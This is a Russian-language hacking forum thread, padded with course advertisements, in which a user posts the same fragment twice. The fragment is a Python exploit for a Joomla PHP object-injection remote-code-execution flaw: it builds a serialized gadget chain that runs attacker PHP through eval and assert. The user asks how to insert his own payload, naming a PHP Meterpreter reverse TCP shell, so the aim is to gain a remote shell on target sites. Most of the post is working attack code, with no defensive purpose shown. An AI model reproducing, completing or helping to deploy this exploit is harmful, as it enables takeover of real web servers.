• 🔥 Бесплатный курс от Академии Кодебай: «Анализ защищенности веб-приложений»

    🛡 Научитесь находить и использовать уязвимости веб-приложений.
    🧠 Изучите SQLi, XSS, CSRF, IDOR и другие типовые атаки на практике.
    🧪 Погрузитесь в реальные лаборатории и взломайте свой первый сайт!
    🚀 Подходит новичкам — никаких сложных предварительных знаний не требуется.

    Доступ открыт прямо сейчас Записаться бесплатно

payload

K

kamaz

Привет народ!!
это часть эксплойта ,где пайлд!
подскаите чем сгенерировать мне свой пайлод? и как правильно все указать?
Код:
def generate(payload):

    php_payload = "eval({0})".format(toCharCode(payload))

    terminate = '\xf0\xfd\xfd\xfd';

    exploit_template = r'''}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";'''

    injected_payload = "{};JFactory::getConfig();exit".format(php_payload)   

    exploit_template += r'''s:{0}:"{1}"'''.format(str(len(injected_payload)), injected_payload)

    exploit_template += r''';s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}''' + terminate

    return exploit_template

def exploit(url):

---- Добавлено позже ----

Привет народ!!
это часть эксплойта ,где пайлд!
подскаите чем сгенерировать мне свой пайлод? и как правильно все указать?
Код:
def generate(payload):

    php_payload = "eval({0})".format(toCharCode(payload))

    terminate = '\xf0\xfd\xfd\xfd';

    exploit_template = r'''}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";'''

    injected_payload = "{};JFactory::getConfig();exit".format(php_payload)  

    exploit_template += r'''s:{0}:"{1}"'''.format(str(len(injected_payload)), injected_payload)

    exploit_template += r''';s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}''' + terminate

    return exploit_template

def exploit(url):

этот пробую php/meterpreter_reverse_tcp ? но как все в коде указать?
 
Последнее редактирование модератором:
как правильно указать мой сгенерированный пайлод в коде (кусок код выше)
спасибо
 
Мы в соцсетях:

Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab